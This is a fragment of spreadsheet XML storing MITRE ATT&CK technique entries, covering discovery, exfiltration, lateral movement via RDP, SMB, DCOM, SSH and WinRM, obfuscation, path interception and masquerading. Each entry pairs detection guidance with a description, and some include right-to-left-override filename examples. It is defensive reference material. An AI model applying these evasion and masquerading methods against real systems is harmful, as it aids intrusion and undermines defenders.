  <si>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Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>discovery</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>macOS,Windows</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</si>
  <si>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</si>
  <si>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Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>User interface,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</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</si>
  <si>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may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network</t>
  </si>
  <si>
    <t>exfiltration</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Process monitoring,User interface</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.
Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process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</si>
  <si>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Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring.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</si>
  <si>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t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>BIOS,MBR,System calls</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)</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</si>
  <si>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t>
  </si>
  <si>
    <t>File monitoring,Host intrusion prevention systems,Application control,Signature-based detection,System access controls,Application control by file name or path,Anti-virus</t>
  </si>
  <si>
    <t>System Network Configuration Discovery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</si>
  <si>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</si>
  <si>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Adversaries may look for details about the network configuration and settings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use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Network protocol analysis,Process monitoring,Process use of network,Process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</si>
  <si>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</si>
  <si>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use local host files (ex: &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; or &lt;code&gt;/etc/hosts&lt;/code&gt;) in order to discover the hostname to IP address mappings of remote systems. 
Specific to macOS, the &lt;code&gt;bonjour&lt;/code&gt; protocol exists to discover additional Mac-based systems within the same broadcast domain.</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Network</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Packet capture,Network protocol analysis</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. </t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>Windows Registry,Windows event logs,Process use of network,Process monitoring,Process command-line parameters,PowerShell logs,Packet capture,Network protocol analysis,Netflow/Enclave netflow,File monitoring,DLL monitoring,Authentication logs,API monitoring</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept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t>
  </si>
  <si>
    <t>lateral-movement</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Process monitoring,Netflow/Enclave netflow,Authentication logs</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>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technique for Persistence.(Citation: Alperovitch Malware)</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Authentication logs,Process use of network</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
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[Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>Windows event logs,Windows Registry,Process monitoring,Packet capture,DLL monitoring,Authentication logs,API monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>Authentication logs,Process use of network,Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Linux,macOS</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell)</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>Process use of network,Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user.
VNC is a desktop sharing system that allows users to remotely control another computer’s display by relaying mouse and keyboard inputs over the network. VNC does not necessarily use standard user credentials. Instead, a VNC client and server may be configured with sets of credentials that are used only for VNC connections.</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)</t>
  </si>
  <si>
    <t>Data from Removable Media</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</si>
  <si>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</si>
  <si>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[cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>Multiband Communication</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</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</si>
  <si>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Correlating alerts between multiple communication channels can further help identify command-and-control behavior.</t>
  </si>
  <si>
    <t>**This technique has been deprecated and should no longer be used.**
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</si>
  <si>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Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</t>
  </si>
  <si>
    <t xml:space="preserve">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 
Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) 
Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. 
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 </t>
  </si>
  <si>
    <t xml:space="preserve">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used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obfuscate commands executed from payloads or directly via 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t>
  </si>
  <si>
    <t>Host forensic analysis,Signature-based detection,Host intrusion prevention systems,Application control,Log analysis,Application control by file name or path</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Process monitoring,Binary file metadata,File monitoring,Malware reverse engineering</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </t>
  </si>
  <si>
    <t>Anti-virus,Signature-based detection</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Binary file metadata</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  </t>
  </si>
  <si>
    <t>Anti-virus,Heuristic detection,Signature-based detection</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.
[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) 
By the end of 2017, a threat group used &lt;code&gt;Invoke-PSImage&lt;/code&gt; to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  </t>
  </si>
  <si>
    <t>T1027.004</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.</t>
  </si>
  <si>
    <t>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</t>
  </si>
  <si>
    <t>Signature-based detection,Host intrusion prevention systems,Anti-virus,Binary Analysis,Static File Analysis</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using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modify the file to explicitly avoid that signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>Anti-virus,Host intrusion prevention systems,Log analysis,Signature-based detection</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</t>
  </si>
  <si>
    <t>Adversaries may schedule data exfiltration to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C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer.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</si>
  <si>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An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>System Owner/User Discovery</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</si>
  <si>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Utilities and commands that acquire this information include &lt;code&gt;whoami&lt;/code&gt;. In Mac and Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)
There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
### Unquoted Paths
Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Baggett 2012)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SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)
### PATH Environment Variable Misconfiguration
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.
### Search Order Hijacking
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT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MSDN Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).</t>
  </si>
  <si>
    <t>persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring,Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.</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</si>
  <si>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
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)</t>
  </si>
  <si>
    <t>Application control by file name or path</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>Invalid Code Signature</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>Right-to-Left Override</t>
  </si>
  <si>
    <t>Detection methods should include looking for common formats of RTLO characters within filenames such as &lt;code&gt;\u202E&lt;/code&gt;, &lt;code&gt;[U+202E]&lt;/code&gt;, and &lt;code&gt;%E2%80%AE&lt;/code&gt;. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.</t>
  </si>
  <si>
    <t>Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.
A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002)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t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>Rename System Utilities</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</t>
  </si>
  <si>
    <t>If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)</t>
  </si>
  <si>
    <t>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>Masquerade Task or Service</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Windows,Linux</t>
  </si>
  <si>
    <t>Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
